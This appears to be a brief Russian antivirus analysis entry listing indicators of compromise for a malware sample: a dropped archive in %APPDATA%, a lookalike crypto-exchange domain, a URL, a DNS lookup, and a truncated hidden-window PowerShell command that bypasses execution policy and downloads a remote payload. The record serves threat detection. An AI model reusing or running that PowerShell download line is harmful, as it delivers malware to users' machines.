Техническая информация
- $ppkadccbwjjkzqfjphkifhkjg
- %APPDATA%\divx\p.zip
- 'pr####le-cex-io.com':80
- http://pr####le-cex-io.com/111.php?13#####
- DNS ASK pr####le-cex-io.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $pPKADcCBWJjKzqFJphkifhKjg='http://profille-cex-io.com/111.php?1345786';$rziujpcazlfhOUZQcAvyzUAPejAg=(New-Object System.Net.WebClient).DownloadString($pPKADcCBWJjKzqFJphkifh...' (со скрытым окном)